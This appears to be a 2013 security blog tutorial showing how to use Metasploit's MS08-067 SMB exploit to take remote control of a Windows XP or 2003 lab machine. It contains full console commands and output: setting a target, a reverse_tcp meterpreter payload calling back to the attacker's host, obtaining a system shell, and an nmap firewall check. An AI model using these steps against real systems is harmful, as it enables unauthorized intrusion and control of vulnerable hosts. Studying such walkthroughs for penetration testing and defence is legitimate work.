There are several posts and videos showing this procedure, but as we have received several questions about this topic we’ll show you how to use Metasploit to take remote control over a Windows XP / 2003 machine.
In this post we’ll take advantage of MS08-067 vulnerability that uses the netapi module in the Windows SMB protocol that may be used for arbitrary code execution. For this, we’ll use two machines, one with Metasploit (this can be Windows or Linux) and a Windows XP (this also can be a Windows 2003).
To get started first let’s open the Metasploit console with the command:
Now, let’s select our vulnerability with the following command:
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >
Now that the prompt reflects the name of the vulnerability, let’s execute the following command to see how it should be configured:
msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description --- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use Exploit target: Id Name -- ---- 0 Automatic Targeting
The first option RHOST indicates the name or IP address of the Windows XP victim we want to attack. RPORT and SMBPIPE are mandatory options that indicate the port used to send the exploit and the type of connection to use. There’s no need to modify these two last values:
To configure the IP of the XP victim, let’s execute the following command:
msf exploit(ms08_067_netapi) > set RHOST 192.168.75.90 RHOST => 192.168.75.90
where 192.168.75.90 is the actual IP of the victim
Section “Exploit target” indicates what platforms can be used by this exploit. If we execute the following command we’ll see all platforms vulnerable to this exploit:
msf exploit(ms08_067_netapi) > show targets Exploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows XP SP2 English (AlwaysOn NX)
From the section above we can see that the actual option of “0” indicates an automatic identification of the victim’s platform, this option is enough and there’s no need to modify it. If you wish, you can change this value to manually define your target with the following command:
msf exploit(ms08_067_netapi) > set target 1 target => 1
Now we have to configure the payload used by our exploit, this indicates Metasploit what to do once the exploit has been successfully executed on the victim’s machine. We can add this configuration with the following option:
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
The “reverse_tcp” payload executes a reverse client on the XP machine, this module connects back to our Metasploit machine through the default port 4444. This payload is the one that will allow us to take control over the XP victim. Now, to indicate the victim to connect to Metasploit, we have to make the following configuration:
msf exploit(ms08_067_netapi) > set LHOST 192.168.75.35 LHOST => 192.168.75.35
Where 192.168.75.35 is the IP address of your own Metasploit machine
With all these steps we are now ready to execute the attack. If we execute the “show options” command we’ll see the final configuration of our exploit:
msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.75.90 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process, none LHOST 192.168.75.35 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting
If everything is ok, we launch the attack by executing the “exploit” command and just wait for the exploit to complete:
msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.75.35:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:Spanish [*] Selected Target: Windows XP SP2 Spanish (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.75.90 [*] Meterpreter session 1 opened (192.168.75.35:4444 -> 192.168.75.90:1049) at 2013-04-08 18:53:58 -0500 meterpreter >
The “meterpreter>” prompt indicates that we are now ready to control de XP machine, to corroborate that we are indeed inside this machine, let’s execute the “sysinfo” command:
meterpreter > sysinfo Computer : TMWINXP01 OS : Windows XP (Build 2600, Service Pack 2). Architecture : x86 System Language : es_MX Meterpreter : x86/win32
Now we can also execute the “shell” command to obtain a prompt from within the victim’s machine and start to execute operations:
meterpreter > shell Process 1652 created. Channel 1 created. Microsoft Windows XP [Versi¢n 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
And there you go! We are now controlling the Victim’s machine. Now, for some situations you may not received the expected meterpreter session, but something similar to the following lines. In this cases you may assume the port we are trying to reach is closed or the attack is being detected by an IPS.
msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.75.35:4444 [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.75.90:445).
The most probable reason for this is the presence of a firewall, may it be external or the Windows firewall, in this case the exploit won’t be able to be executed. If you want to verify the port is closed you can execute the following command from Metasploit.
msf exploit(ms08_067_netapi) > nmap 192.168.75.90 [*] exec: nmap 192.168.75.90 Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-08 19:18 CDT Nmap scan report for 192.168.75.90 Host is up (0.00019s latency). All 1000 scanned ports on 192.168.75.90 are filtered MAC Address: 00:0C:29:4E:E1:93 (VMware) Nmap done: 1 IP address (1 host up) scanned in 34.51 seconds
This result confirms the victim is behind a Firewall. In this case we may use another vulnerability / exploit to take remote control of the victim.
Remember to send us your questions and comments to our Twitter account: @redinskala where you will find more information and security tips.
Thanks for your visit!